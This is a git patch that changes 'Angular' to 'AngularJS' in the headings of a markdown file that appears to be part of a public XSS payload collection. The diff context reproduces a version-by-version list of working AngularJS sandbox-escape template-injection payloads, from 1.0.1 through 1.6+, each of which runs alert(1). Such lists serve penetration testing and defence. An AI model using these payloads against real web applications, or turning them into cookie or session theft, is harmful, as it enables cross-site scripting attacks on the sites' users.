From e95b0c34a3e01e0510e81f1eb98065fd109b7da9 Mon Sep 17 00:00:00 2001
From: Kyle Martin
Date: Sat, 7 Dec 2019 10:54:47 +1300
Subject: [PATCH] clarify AngularJS vs Angular

---
 XSS Injection/XSS in Angular.md | 40 ++++++++++++++++-----------------
 1 file changed, 20 insertions(+), 20 deletions(-)

diff --git a/XSS Injection/XSS in Angular.md b/XSS Injection/XSS in Angular.md
index 21302e8..1749a9a 100644
--- a/XSS Injection/XSS in Angular.md
+++ b/XSS Injection/XSS in Angular.md
@@ -1,20 +1,20 @@
-# XSS in Angular
+# XSS in Angular and AngularJS
 
 ## Client Side Template Injection
 
 The following payloads are based on Client Side Template Injection.
 
-### Stored/Reflected XSS - Simple alert
+### Stored/Reflected XSS - Simple alert in AngularJS
 
-> Angular as of version 1.6 have removed the sandbox altogether
+> AngularJS as of version 1.6 have removed the sandbox altogether
 
-Angular 1.6+ by [Mario Heiderich](https://twitter.com/cure53berlin)
+AngularJS 1.6+ by [Mario Heiderich](https://twitter.com/cure53berlin)
 
 ```javascript
 {{constructor.constructor('alert(1)')()}}
 ```
 
-Angular 1.6+ by [@brutelogic](https://twitter.com/brutelogic/status/1031534746084491265)
+AngularJS 1.6+ by [@brutelogic](https://twitter.com/brutelogic/status/1031534746084491265)
 
 ```javascript
 {{[].pop.constructor('alert\u00281\u0029')()}}
@@ -22,7 +22,7 @@ Angular 1.6+ by [@brutelogic](https://twitter.com/brutelogic/status/103153474608
 
 Example available at [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?a=%7B%7B[].pop.constructor%26%2340%27alert%5Cu00281%5Cu0029%27%26%2341%26%2340%26%2341%7D%7D)
 
-Angular 1.6.0 by [@LewisArdern](https://twitter.com/LewisArdern/status/1055887619618471938) & [@garethheyes](https://twitter.com/garethheyes/status/1055884215131213830)
+AngularJS 1.6.0 by [@LewisArdern](https://twitter.com/LewisArdern/status/1055887619618471938) & [@garethheyes](https://twitter.com/garethheyes/status/1055884215131213830)
 
 ```javascript
 {{0[a='constructor'][a]('alert(1)')()}}
@@ -30,7 +30,7 @@ Angular 1.6.0 by [@LewisArdern](https://twitter.com/LewisArdern/status/105588761
 {{$on.constructor('alert(1)')()}}
 ```
 
-Angular 1.5.9 - 1.5.11 by [Jan Horn](https://twitter.com/tehjh)
+AngularJS 1.5.9 - 1.5.11 by [Jan Horn](https://twitter.com/tehjh)
 
 ```javascript
 {{
@@ -49,25 +49,25 @@ Angular 1.5.9 - 1.5.11 by [Jan Horn](https://twitter.com/tehjh)
 }}
 ```
 
-Angular 1.5.0 - 1.5.8
+AngularJS 1.5.0 - 1.5.8
 
 ```javascript
 {{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
 ```
 
-Angular 1.4.0 - 1.4.9
+AngularJS 1.4.0 - 1.4.9
 
 ```javascript
 {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
 ```
 
-Angular 1.3.20
+AngularJS 1.3.20
 
 ```javascript
 {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
 ```
 
-Angular 1.3.19
+AngularJS 1.3.19
 
 ```javascript
 {{
@@ -76,7 +76,7 @@ Angular 1.3.19
 }}
 ```
 
-Angular 1.3.3 - 1.3.18
+AngularJS 1.3.3 - 1.3.18
 
 ```javascript
 {{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
@@ -84,7 +84,7 @@ Angular 1.3.3 - 1.3.18
 $eval('x=alert(1)//'); }}
 ```
 
-Angular 1.3.1 - 1.3.2
+AngularJS 1.3.1 - 1.3.2
 
 ```javascript
 {{
@@ -94,7 +94,7 @@ Angular 1.3.1 - 1.3.2
 }}
 ```
 
-Angular 1.3.0
+AngularJS 1.3.0
 
 ```javascript
 {{!ready && (ready = true) && (
@@ -113,37 +113,37 @@ Angular 1.3.0
 );}}
 ```
 
-Angular 1.2.24 - 1.2.29
+AngularJS 1.2.24 - 1.2.29
 
 ```javascript
 {{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
 ```
 
-Angular 1.2.19 - 1.2.23
+AngularJS 1.2.19 - 1.2.23
 
 ```javascript
 {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
 ```
 
-Angular 1.2.6 - 1.2.18
+AngularJS 1.2.6 - 1.2.18
 
 ```javascript
 {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
 ```
 
-Angular 1.2.2 - 1.2.5
+AngularJS 1.2.2 - 1.2.5
 
 ```javascript
 {{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
 ```
 
-Angular 1.2.0 - 1.2.1
+AngularJS 1.2.0 - 1.2.1
 
 ```javascript
 {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
 ```
 
-Angular 1.0.1 - 1.1.5 and Vue JS
+AngularJS 1.0.1 - 1.1.5 and Vue JS
 
 ```javascript
 {{constructor.constructor('alert(1)')()}}